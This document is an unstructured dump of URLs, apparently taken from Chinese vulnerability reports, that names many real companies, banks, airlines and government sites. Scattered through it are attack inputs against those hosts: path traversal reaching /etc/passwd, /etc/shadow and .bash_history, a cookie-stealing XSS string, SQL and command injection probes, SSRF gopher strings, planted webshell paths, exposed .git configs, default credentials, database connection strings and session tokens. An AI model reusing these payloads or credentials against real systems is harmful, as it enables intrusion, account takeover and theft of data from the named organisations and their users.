http://house.19lou.com/newhouse-house-1&area=0&name=&price=0&houseType=0&homeType=%E5%A4%8D%E5%BC%8F%E5%AE%A4* http://m.rrs.com/snaplb/consulting/query/productlist?productTypeId=11&_=1458245171371 http://www.bypay.cn http://122.144.144.199/ http://60.28.217.187:8088/.svn/entries http://60.28.217.187:8088 
https://**.**.**.**/ebweb/prelogin.do?BankId=9999&_locale=zh_CN http://us.speedx.com http://us.speedx.com/forum/uc_server/data/cache/apps.php http://tester.speedforce.com:7777/admin http://tester.speedforce.com:9999/admin http://weixin.haolyy.com/.git/config http://vip.haolyy.com/log.txt http://v.duba.com/moviedetail/98909*.html http://golf.cctv.com/e/extend/court/court_search.php?page=28&pt=1 http://**.**.**.**/ http://**.**.**.**/newscenter/ztbd/2009-02/10/content_15656399.htm http://vs.ptbus.com/zblb_1/?name=%E5%B0%8F%E6%89%8B%E9%81%AE%E5%A4%A9 http://id.ourgame.com/shika/shika/createShiKa/about.do http://id.ourgame.com/shika/shika/createShiKa/about.do http://dz.cheyipai.com/ http://vx.268v.com/Login.aspx?ReturnUrl=%2f http://**.**.**.**/mobctsystopadvertising http://**.**.**.**/mobctsystopadvertising http://drops.wooyun.org/tips/749 http://www.sosocome.com/ http://www.pgyer.com/uMWn http://www.pgyer.com/ZAjT www.sosocome.com http://qijilanqiu.game.weibo.com/admin/notice?appId=1 http://brand.creditease.cn(和 http://brand.creditease.cn/activity-single.htm?id=22 http://brand.creditease.cn/activity-single.htm www.ceairdutyfree.com http://www.ceairdutyfree.com/p_list.aspx?isHot=1 http://www.ceairdutyfree.com/p_list.aspx?isHot=1 http://www.ceairdutyfree.com/p_list.aspx?isHot=1 http://211.162.66.163:9999/login.action http://**.**.**.**:7003/ecdomain/framework/housingfund/index.jsp http://s.**.**.**.**/ http://y.**.**.**.**/order360/OrderCenter/Home/detail?orderId=%27 http://www.scal.com.cn/Web/Home/GetTerminalServicesList http://**.**.**.**:8080/bocoit/common2.asp?id=2488 http://cabin.ceair.com/ http://id.ceair.com:7777/idmsso/login.jsp?authn_try_count=0&contextType=external&username=string&contextValue=%2Foam&password=sercure_string&challenge_url=http%3A%2F%2Fid.ceair.com%3A7777%2Fidmsso%2Flogin.jsp&request_id=-2769253801084227145&locale=zh_CN&resource_url=http%253A%252F%252Fcabin.ceair.com%252Fportal%252F http://ct400.cn/ http://www.sh-holiday.com/ 
http://www.sh-holiday.com/tourism/dhth/list?departcity=HGH&destinationcity=&keywords=1&startdate1=&startdate2= http://wtv.5211game.com:80/Default/Service/NewService.ashx?op=NewsLisAll&categoryIds=11 http://pk.tom.com/ http://pk.tom.com/web/download_page.jsp?source=HP_mobilegame_bybsb&mobile_game_id=1294&from=00403&class=and&q_id=99 http://jr.yichemall.com/Search/GetFinaceCarImgData?carIds=1*&_=1458391361838 http://**.**.**.**:80/ http://sh.51jiabo.com/member/login.shtml?redirect_url=b3JkZXIvc2FsZQ==%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://zz.51jiabo.com/get_special_coupon?code_id=2 http://qd.51jiabo.com/get_special_coupon?code_id=2 http://sh.51jiabo.com/get_special_coupon?code_id=2 http://www.ticket.51jiabo.com/.git/config http://gz.ticket.51jiabo.com/.git/config http://ks.ticket.51jiabo.com/.git/config http://gamemanager.duowan.com/auther/login.html https://img.mabudai.com/file/request/get?request_attach_id=647&user_uid=4216&token=34259f0eab34a3934fb2778205b4a126 http://piwik.jiea.iqianjin.com:8888 http://piwik.jiea.iqianjin.com:8888//plugins/weathermap/editor.php http://piwik.jiea.iqianjin.com:8888//plugins/weathermap/configs/f.php?ca=assert http://uimall.pflife.com.cn/ www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29 uimall.pflife.com.cn/online/mall/index.jsp C6E3F9FD57E5DA4F9BB6CB28FA108AE5:FG=1 http://**.**.**.**/army_service.aspx http://app.finance.ifeng.com/stock/dxf/day.php?day=20080808&orderby=amount&ordertype=desc http://180.97.80.205/ http://180.97.80.205/appaction/bao_detail.php?id=51&time=0.9278282364830375 http://180.76.135.96 http://wooyun.org/bugs/wooyun-2016-0178214 http://oss.zszs.game.yy.com/ http://zc.urtrust.com.cn/ https://zc.urtrust.com.cn:9093/casserver/login?service=http%3A%2F%2Fzc.urtrust.com.cn%3A9080%2Fprpall%2Findex.jsp http://59.151.12.39/admin/PostsManager/NewPostsList.aspx 
http://**.**.**.**/index.php/Home/Index/goodslist2?pagetext=%E8%8A%B1%E8%8A%B1%E5%85%AC%E5%AD%90 http://wooyun.org/bugs/wooyun-2010-0177548 http://**.**.**/_ http://**.**.**/script_ jdbc:oracle:thin:@**.**.**.**:1521:irms11g http://tbpms.cheyipai.com http://202.101.47.116/Login.aspx?doFrom=index http://180.168.192.19:80/ http://www.lixin360.com/home/upDown.jhtml?keyName=teamId&objId=57&tableName=Team&_=1458464999822 http://mobile.kuwo.cn/mpage/special/showSpecalShare.jsp?id=1874 http://mobile.kuwo.cn/mpage/special/showSpecalShare.jsp?id=1874 http://sqlmap.org http://192.168.48.250/frontweb/login.html http://192.168.48.250/login.php http://www.elegantliving.cn/ jdbc:mysql://localhost:3306/living3?pinGlobalTxToPhysicalConnection=true http://10.3.3.165:7001/uddi/wooyun.jsp http://android.myapp.com/myapp/detail.htm?apkName=com.jjl http://www.jjlwd.com/mobile/appService.do www.jjlwd.com http://www.jjlwd.com/mobile/appService.do www.jjlwd.com http://www.jjlwd.com/mobile/appService.do www.jjlwd.com http://www.jjlwd.com/mobile/appService.do www.jjlwd.com http://www.jjlwd.com/mobile/appService.do www.jjlwd.com http://www.jjlwd.com/mobile/appService.do www.jjlwd.com http://114.112.88.208:7300/server/page_download/ admin:123456 https://github.com/zbwill/SnailApp/blob/f6060043dc2643839c523b38d9c84c34e8804b77/tests/projects/duobao/HYGMSBaseAction.py www.ganji.com https://e.grcbank.com//dl/app/download.do?fn=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0%00.0apk https://e.grcbank.com//dl/app/download.do?fn=../../../../../../../../../../etc/issue%00.0apk http://xing.268v.com http://xing.268v.com/pages/forms/SaleBill.aspx?bid=764&wfno=SG108&bizid=764&carid=536&biztype=0¤tSubWfNo=&wfnod=SG107&isarea= http://app.mofang.com/ http://116.55.241.7:9091/manager/html http://116.55.241.7:9091/job/index.jsp http://10.180.201.163:8081 http://10.180.201.228:8080 http://10.180.201.229:8081 http://10.180.201.235:80 http://10.180.201.240:80 
http://ffp.okair.net/welcome.action http://www.19lou.com/topic/activity/activity_ajax.php?obj=activity_item&req=items_by_page&activity_name=sh-2013-ruilinvxing&order=id&asc=asc&order2=&asc2=&col_num=1&per_page=100&page=1&category=sh-ruilinvxing-moon http://www.19lou.com/topic/activity/activity_ajax.php?obj=activity_item&req=items_by_page&activity_name=sh-2013-ruilinvxing&order=id&asc=asc&order2=&asc2=&col_num=1&per_page=100&page=1&category=sh-ruilinvxing-moon http://sqlmap.org http://gakushoku.fukushima-nct.ac.jp/GakuShokuWeb/ShowPortal.action http://gakushoku.fukushima-nct.ac.jp/GakuShokuWeb/ShowPortal.action http://appman.itc.nagoya-u.ac.jp:8080/struts2-showcase/tiles/freemarker.action http://root.yingmoo.com/ http://*.*.*/xss.swf http://bcy.net/novel/detail/11560/493497, http://bcy.net/novel/detail/11560/493525 http://106.38.226.155:8080/ https://www.yonglibao.com/User/auth/verifyCode/ POST:tel=13900001111 http://221.8.57.99:7002/uddiexplorer/1.jsp?o=vLogin http://www.yonglibao.com/App http://**.**.**.**/webmail/login.php http://**.**.**.**/mailcontrol/linux.php?name=x||id http://**.**.**.**/webmail/data/wo.txt http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/data/wo.txt http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php 
http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**.mo/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php 
http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**.mo/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**.mo/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://pop3.55bbs.com/extmail/cgi/index.cgi http://smtp.55bbs.com/extmail/cgi/index.cgi https://m.xueshandai.com/password/mobile https://github.com/wyk2011fj/wyk.gitwiki.com/blob/935d288e2702a9b64a4a52cd603497de401da544/资料们/简单demo/java邮件发送/mailTest/src/mailTest/test.java https://login.netease.com/accounts/login/?uid=*****&next=***** http://120.55.149.174/ http://nngl.3322.org:8880/ 
http://data.auto.sina.com.cn/car/api/car_detail/filter_car.php?callback=jQuery1720008847676683217287_1458496287365&oe=utf-8&subid=2027&_=1458496287525 http://highstyle.fashion.ifeng.com/play/getplay?objname=1 http://lm.meilishuo.com/union/pro_manage/?sort=0&catalog=0&type=1&content=%E6%97%B6%E5%B0%9A%E8%BF%90%E5%8A%A8%E5%B0%8F%E7%99%BD%E9%9E%8B http://**.**.**/_ fir.im/rrc。_ fir.im/rrc。_ http://www.csic-711.com/xw1.php?id=632 http://www.csic-711.com/admin/ http://61.233.8.175/ http://61.233.8.175/wO0yun/index.jsp https://mesosphere.github.io/marathon/docs/ http://111.206.209.149:8080/ui/#/apps http://i.dajianet.com/space.php?uid=518&validated=true http://business.sohu.com/20150812/n418676342.shtml http://107room.com/admin/contact/ https://github.com/birju-qiku/forum-backend/blob/52ab5c5879c9ab029ff8dda0e48857255274f4a4/dev.conf.js https://github.com/birju-qiku/forum-backend/blob/52ab5c5879c9ab029ff8dda0e48857255274f4a4/prod.conf.js http://android.myapp.com/myapp/detail.htm?apkName=com.datebao.datebaoapp http://m.datebao.com/order/postnewcreate http://m.datebao.com/order/newcreate/85?client_type=ios&pk_campaign=from_android http://m.datebao.com https://**.**.**.** jar:/usr/java/bin:/usr/java/lib:/u01/app/oracle/product/10.2/jdbc/lib/ojdbc14.jar:/u01/app/oracle/product/10.2/jdbc/lib/classes12.zip:/u01/app/oracle/product/10.2/jdbc/lib/nls_charset12.jar:/usr/j2ee/lib/j2ee.jar:/usr/local/jakarta/tomcat/bin/bootstrap.jar:/usr/local/jakarta/tomcat/bin/commons-logging-api.jar http://61.142.114.199/ http://61.142.114.199/wO0yun/index.jsp http://ucenter.51cto.com/setemailpass.php?id=7804861&unid=7747d234f4b2b8cab3e55485f2884abc http://ucenter.51cto.com/setemailpass.php?id=7804861&unid=679c5b68bc1b974db24b3c2ca38660a4 http://ucenter.51cto.com/setemailpass.php?id=7804861&unid=27b8a923b86dfba72b40673a7fbecc14 http://ucenter.51cto.com/setemailpass.php?id=10007943&unid=fc0b2180ee91325e44e9782f5b79cad8 
http://ucenter.51cto.com/setemailpass.php?id=10007943&unid=cca1df879eec29c438ff2b3767769ef7 http://58.61.147.11/seeyon http://58.61.147.11/seeyon//logs/login.log user:weblogic pwd:weblogic1 http://lab.10jqka.com.cn/school/quickSearch/ http://**.**.**.**/bugs/wooyun-2015-0118302/ http://**.**.**.**:8090/phpmyadmin/ http://cs.dfb365.com http://211.156.198.57 http://211.156.198.57/jsp/yzznzd/clgl/clgl_cx.jsp http://m.keyunzhan.com/zhandaozhan_search.php http://m.keyunzhan.com/index.php?module=Mobile&action=Index&lanmu=tianqi http://m.keyunzhan.com/huoche/find.php http://m.keyunzhan.com/huoche/hcz.php http://agency.1jiajie.com/index.php?action=login http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://220.165.4.29/ http://221.179.193.208/ http://zhaopin.nbcb.cn/recruit/com.nbcb.recruit.auth.index.flow http://zhaopin.nbcb.cn/recruit/rckgl/download.jsp?zipFile=/recruit/resume/schoolResume//20160322012458.zip http://zhaopin.nbcb.cn/recruit/rckgl/download.jsp?zipFile=/etc/shadow http://118.123.173.91/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1 http://118.123.173.91/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://118.123.173.91/pweb/careerapply/HrmCareerApplyWorkEdit.jsp?id=1 http://118.123.173.91/pweb/careerapply/HrmCareerApplyWorkView.jsp?id=1 http://118.123.173.91/web/careerapply/HrmCareerApplyWorkEdit.jsp?id=1 http://118.123.173.91/web/careerapply/HrmCareerApplyWorkView.jsp?id=1 http://118.123.173.91/web/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://118.123.173.91/web/careerapply/HrmCareerApplyPerView.jsp?id=1 https://**.**.**.**/jixf8507/kwang/blob/bf66140a67a39f2ea423071285dd419577cea862/wang/src/email.properties http://www.sannongziben.com/ http://demo.sannongziben.com/ http://demo.sannongziben.com/.svn/entries http://cemftp.ce-air.com/yyoa/index.jsp http://cemftp.ce-air.com/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 http://www.ntjxt.com/areas?area_id=1 
http://mceair.962008.com/Member/USERINFO/Default.aspx http://mceair.962008.com mceair.962008.com/Control/Destination.aspx mceair.962008.com/%3Fplg_nld%3D1%26plg_uin%3D1%26plg_auth%3D1%26plg_nld%3D1%26plg_usr%3D1%26plg_vkey%3D1%26plg_dev%3D1 http://mceair.962008.com/Member/USERINFO/Default.aspx https://www.pzb.com/view/html/user/forgetPassword.shtml https://www.pzb.com/web/view/anon/new/resetPassword www.pzb.com https://www.pzb.com http://cs.funxoo.com/eshouselist.php?catid=78&posids= http://112.74.111.42:7000/qn/listInfo http://221.179.190.21:8080/ http://42.156.250.117/internal/Explorer http://ninebot.cn/bbs/utility/convert/index.php?a=config&source=d7.2_x2.0 http://ninebot.cn/bbs//utility/convert/data/config.inc.php http://**.**.**.**/bugs/wooyun-2014-063422 http://www.luckyair.net/ http://cargo2.ce-air.com/MU/ http://trb-b2g.ce-air.com/MUB2G/login.do http://www.we189.com/index.php?mod=product&view=show&cd=0&id=401 http://download.ztgame.com:8088/j_acegi_securit http://sqlmap.org http://bj.luckyair.net/8l/report_agent/AgentSalesReport!receive.action?loginIdsStr=0373e0ff6db453c8109dff48f1b4ef54893c87fc347ecc8e5d9952707a283483927d17447741efd295b36bb3dfd743de http://bj.luckyair.net/8l/report_agent/AgentSalesReport!receive.action http://x.luckyair.net:88/cms/logout.jspx?returnUrl=http://www.baidu.com http://pyh.luckyair.net:8081/examples/servlets/servlet/CookieExample?cookiename=HAHA&cookievalue=\"FOO;+Expires=Thu,+1+Jan+2009+00:00:01+UTC;+Path=/ http://www.183read.com/ http://www.dingxincf.com/bbs/uc_server/admin.php http://www.dingxincf.com/bbs/uc_server/1.php http://games.renren.com/bbs.tar.gz https://**.**.**.**/mdm/cd.jsp?z0=utf-8 https://**.**.**.**/mdm/admin/authenticate.do http://103.15.202.155/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Froot%2F.bash_history http://114.80.121.110:8990/login.do http://**.**.**.**/Home-zh.htm http://**.**.**.**/java-deserialization-vulnerability-overlooked-mass-destruction/ 
http://us.ceair.com:80/muovc/newsitefront/checkin/muss/checkin!doInit.shtml?&redirect:xxx${13579246-1 https://github.com/zjw1993/recruitmentJobSite/blob/f28c8f832a99a87c44f5bce31afcf05eabffb625/src/main/java/com/zjw/recruitmentJobSite/utils/email/MailUtil.java http://m.sinosig.com/mobile/index/index!sendMsg?newMobile=13888888888&token=2882cb3c-4e93-47f9-a5fa-c2b6ab59df04 http://space.show.sina.com.cn/ajax/getMessageLi http://sqlmap.org http://www.madailicai.com/qywf/getPeerAgent.action?ivrMark=0&widgetCode.widgetId=240&visitorSource=%E5%AE%98%E7%BD%91&templateName=2&dialogName=&userId=&smsId=&namews=&unionId=&vistorUrlTitle=&vistorUrl=&14567301704021458307662705 http://cs.xyzq.com.cn:82使用的是jboss,调用jboss的插件发现存在java反序列化漏洞 www.guilincable.com/company.asp?id=2 www.guilincable.com/company.asp?id=2 http://www.scal.com.cn/Web/Home/GetAirPlanList http://www.clic.org.cn/jeeadmin/jeecms/login.do?returnUrl=/jeeadmin/jeecms/index.do http://cloud.isoftstone.com/ https://www.yuanobao.com/index.htm http://invest.10jqka.com.cn/getbankbyall.php?code=00213928 http://invest.10jqka.com.cn/getbankbyall.php?code=00213928 http://invest.10jqka.com.cn/getbankbyall.php?code=00213928 http://www.chebada.com/Home/Index http://ccutnews.ccut.edu.cn/jsp/pl_news.jsp?articleId=2855&_=1458488952199 http://brcms.yixin.com/s/gateway/index.php http://brcms.yixin.com/s/gateway/index.php?gateway_destination=activity_honored_guest_talk/admin/GetList&func_name=GetList&activity_id=1 http://**.**.**.**/DBTVIntegration/sysUser/login.do inurl:news_list.asp?id= http://**.**.**.**/news_list.asp?id=70 url:http://xs.ceair.com/ http://xs.ceair.com/webservice/esbmessage.php http://**.**.**.**/bugs/wooyun-2010-0125244对比了下错误页面 http://utf7.ml/t/uc3.html http://www.10jqka.com.cn/ad_mar/tgt_lwds/index.php?op=post_info&pid=18 http://www.10jqka.com.cn/ad_mar/tgt_lwds/index.php?op=post_info&pid=18 http://sqlmap.org http://121.15.209.216/ GETSHELL:http://121.15.209.216/wo0yun/1ndex.jsp 
http://cache.video.qiyi.com/vps?tvid=449747800&vid=8619c4c122f01ba70d5d45ce73e7646c&uid=1209531862&v=0&qypid=449747800_33&src=02022001010000000000&t=1458704349000&k_tag=1&k_uid=865700021218002&rs=1&vf=ec92d0a1519a58746ce9457f7f564b47","ip":"106.38.219.22","duration":344,"code":200,"return_data":""},"access_vip":{"url":"","ip":"","duration":0,"code":0,"return_data":""},"access_pdata":{"url":"http://data.video.qiyi.com/videos/v0/20160212/34/b2/9068a56cf18079e67665946f01f05bc7.f4v?qd_tvid=449747800&qd_vipres=0&qd_index=1&qd_aid=449747800&qd_stert=0&qd_scc=c6a193db5b6b1ed90e5323b1336ade72&qd_sc=a4f559061be96311318c6bc786e57297&qd_src=02022001010000000000&qd_ip=2ac82210&qd_uid=1209531862&qd_tm=1458704371000&qd_vip=0","ip":"106.38.178.240","duration":254,"code":200,"return_data":""},"cache_status":{"url":"","ip":"","duration":0,"code":0,"return_data":"","avgspeed":0,"302url":"","idc":"netcnc_oversea http://**.**.**/_ http://**.**.**/_ http://**.**.**/script_ http://cms.kting.cn/index.php?act=login https://github.com/yangyangxf100/mywork/blob/6e058b837b6f8aef30303caba9224d0d41f72964/cms/readMe.txt http://piwik.l99.com http://180.169.108.241:7001/ http://api.yonglibao.com/Apiv7/User/myinfo http://oa.huayetongxun.com:91/MobileApp/login.aspx http://oa.huayetongxun.com:91/MobileApp/login.aspx https://github.com/yhc19850706/yhcgit/blob/a66e184aae2ae52785df6c779257b947101aa353/yhc/src/main/java/com/bl/web/common/utils/MailUtil.java http://daohang.weixin.com/WxList.aspx?classid=1006 http://**.**.**.**//Service/Card/getRequestState http://111.207.209.58:8090/ http://**.**.** http://**.**.**/job/site_ http://**.**.**/_ http://t.10jqka.com.cn/api.php?cookie=user%3DMDpteF8zMDAzODg3NTk6Ok5vbmU6NTAwOjMxMDM4ODc1OTo3LDExMTExMTExMTExLDQwOzQ0LDExLDQwOzYsMSw0MDs1LDEsNDA6MTY6OjozMDAzODg3NTk6MTQ1ODc5Njg5NTo6OjE0NDQzMTc2MDA6MzQyNTkwNTow;userid%3D300388759;u_name%3Dmx_300388759;escapename%3Dmx_300388759;ticket%3Df8aa2fc8c157141d04294be778d9f0b0&followuid=3424215372&method=trace.followAce 
http://mailer.lvmama.com:8081/smartedm/services http://mailer.lvmama.com:8081/smartedm/services/EDMService?wsdl http://221.228.212.171:8081/smartedm/welcome.do http://221.228.212.171:8081/smartedm/services http://i.meituan.com/salon/barber/9468 http://i.meituan.com/salon/barber/9467 http://47.88.32.21:7001/ http://www.xingduoduo.com/website-rank/getVoteRecordByManuscriptId.action http://**.**.**/_ http://**.**.**/job/ctbTest/ws/shiyi/shiyiTest.java/*view*/_ traffic.chetuobang.com/";_ wxlk.chetuobang.com/";_ wxlk-files.chetuobang.com/";_ http://www.zhemai.com/chaofan/index.php?mod=index&act=index&go_mod=webset&go_act=center http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/script_ ssh://114.215.150.232:8200 mysql://114.215.150.232:3306 index.php/api/xunjia/AjaxAskPrice http://www.ftchinese.com/m/events/recent.html?id=2095 https://dl.wx.cmbchina.com/backup/cmbgo/index.php/Home/Simple/login https://218.17.210.134/backup/cmbgo/index.php/Home/Simple/login https://dl.wx.cmbchina.com/backup http://60.28.198.61:9022 google:inurl:/service/~iufo http://58.61.28.213:8091/开始不确定是国信的IP,反正是这个断.利用神器找到一个弱口令利用weblogic部署了一个war包,搞到了一个shell。一句话被干掉了,就剩下了cmd的 http://219.141.171.219/ajax/LoginAction!login.action http://bbs.juzilicai.com http://bbs.juzilicai.com https://passport.bilibili.com/site处有绑定微博设置。 https://passport.bilibili.com/login http://211.150.66.21/user.action http://message.haidilao.com:8081/ http://fx.lvmama.com/user/index.do http://www.hncgw.cn/Login.aspx http://www.hncgw.cn/html/ http://android.myapp.com/myapp/detail.htm?apkName=com.huolicai.android http://huo.yonglibao.com/ http://www.dragontrans.com/ http://**.**.**/ http://**.**.**/bea_wls_internal/a.jspx jdbc:oracle:thin:@10.254.0.146:1521:lbxolap user:lbxhis http://**.**.**/ETMS/setLang.action_ http://**.**.**/_ cast:198.25.100.191***** a9d:67ff:fe15:7***** http://www.baomihua.com/space/RankAllList.aspx http://static.baomihua.com/doc.rar http://show.baomihua.com/baomihua.tar.gz 
http://resources.baomihua.com/swf.rar http://reg.baomihua.com/reg.rar http://pvstat.baomihua.com/wwwroot.rar https://github.com/iRunningClub/www/blob/2b592a3ec80f1fd1263b2e09348cec0a1e719948/kohana/modules/author/config/author.php http://wx.foundersc.com/../../../../../../../../etc/passwd http://i.wps.cn/?act=login登陆位置没有验证码没有登陆限制 http://**.**.**.**/tsky/ http://**.**.**.**/login_cn.jsp http://**.**.**.**//js/%C0%AE%C0%AE/WEB-INF/web.xml http://**.**.**.**/css/%C0%AE%C0%AE/WEB-INF/web.xml http://**.**.**.**//%c0%ae/WEB-INF/web.xml https://112.124.107.207:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd http://**.**.**.** http://tuiguang.guagua.cn/ http://tuiguang.guagua.cn/xiaoma.php http://**.**.**.**/涉及全国各省市业务 http://www.wandoujia.com/apps/com.gold.palm.kitchen http://android.myapp.com/myapp/detail.htm?apkName=com.gold.palm.kitchen http://apk.hiapk.com/appinfo/com.gold.palm.kitchen http://zhushou.360.cn/detail/index/soft_id/485874?recrefer=SE_D_%E6%8E%8C%E5%8E%A8 http://boss.izhangchu.com/main/index http://boss.izhangchu.com/main/index http://h5.izhangchu.com) http://xxx.xxx.xxx.xxx:6080/main.php?sessid=5772430e1cd708d2521d9a0dedadd904&act=netdisk&opt=html5upload&ftpfolder=Ly4uLy4uL3dlYm1haWwvd3d3Lw==&retid=0.8386508285207916 http://**.**.**.**/bugs/wooyun-2010-0166751 file:/// gopher://remote_ip:port/?%a file:/// gopher://remote_ip:port/?%a https://103.240.244.6/mdm/f.jsp?z0=utf-8 https://mdm.haidilao.com/mdm/temp/user/template.csv https://mdm.haidilao.com/mdm/selfDevice/toDeviceDetail.do?deviceId=566 http://igame.qq.com/pmdcampus/wx-app/order-detail.php?uid=0EEF79D800EDDB9ED27F6552FABB7F2C55A5E4DFD68C675B&ctime=1458560346就不出出现提醒请在微信客户端打开该链接了。 http://wx.sohu-inc.com/index.jsp http://wx.sohu-inc.com/wAction!findWorks.action http://m.52zzb.com/cm/mobile/basedata/my/getMyPoliciesByPagging http://m.52zzb.com url:http://crm.iflytek.com/ 
http://event.leyingke.com/spec/recruitment/personal/ http://www.fsdsm.gov.cn/index.jhtml http://www.fsdsm.gov.cn:7001/console http://passport.bilibili.com/intranet/acc/login?mid=1 http://oa.bjsto.cn/C6/Jhsoft.Web.login/newview.aspx?id=1 http://e.dxy.cn/harmonic2012/surgery/21/2 http://e.dxy.cn/harmonic2012/surgery/21'%20and%20'1'='1 http://e.dxy.cn/harmonic2012/surgery/21'%20and%20'1'='2 http://z.mafengwo.cn/lvyou/57178.html http://ft.10jqka.com.cn/thsft/iFindService/CellPhone/i-strategy/search http://218.17.224.157/ http://www.wandoujia.com/apps/com.brightdairy.personal http://zhushou.360.cn/detail/index/soft_id/3013276?recrefer=SE_D_%E5%85%89%E6%98%8E%E9%9A%8F%E5%BF%83%E8%AE%A2 http://android.myapp.com/myapp/search.htm?kw=%E5%85%89%E6%98%8E%E9%9A%8F%E5%BF%83%E8%AE%A2 http://mobile.baidu.com/#/item?docid=8113206&source=mobres&from=1010680m jdbc:oracle:thin:@**.**.**.**:1521:ORA11G jdbc:oracle:thin:@**.**.**.**:1521:ORA11G http://www1.kugou.com/ting/Pager.aspx?r=0.21206053676474657&tableName=Comments&action=getdata&pageSize=6&selectFields=&orderField=AddTime&isDesc=True&where=++Source%3D2+and+SourceID%3D53*++&pageIndex=1 http://www1.kugou.com/ting/Pager.aspx?r=0.21206053676474657&tableName=Comments&action=getdata&pageSize=6&selectFields=&orderField=AddTime&isDesc=True&where=++Source%3D2+and+SourceID%3D53*++&pageIndex=1 http://sqlmap.org jdbc:oracle:thin:@ jdbc:oracle:thin:@// http://weixin.axatp.com/phpmyadmin/ http://imo.cheyipai.com/file/NDisk/write.php http://imo.cheyipai.com/file/NDisk/write.php http://222.66.197.152/ http://222.66.197.152/uddiexplorer/ssss.jsp http://221.8.57.106:7002/mses/ http://221.8.57.106:7002/uddiexplorer/cccc.jsp jdbc:oracle:thin:@10.0.7.101:1521:ahdb http://**.**.**.**/mall/getOrderInfoOfCustomer.htm?orderId=14414&wechatAccount=gh_445933eaf53a http://**.**.**.**/mall/getOrderInfoOfCustomer.htm?orderId=14415&wechatAccount=gh_445933eaf53a https://github.com/xwx2015/lifecircle/blob/51bb06bb46bc641de2225d42cfb0e23b68ff4f7e/Web.config 
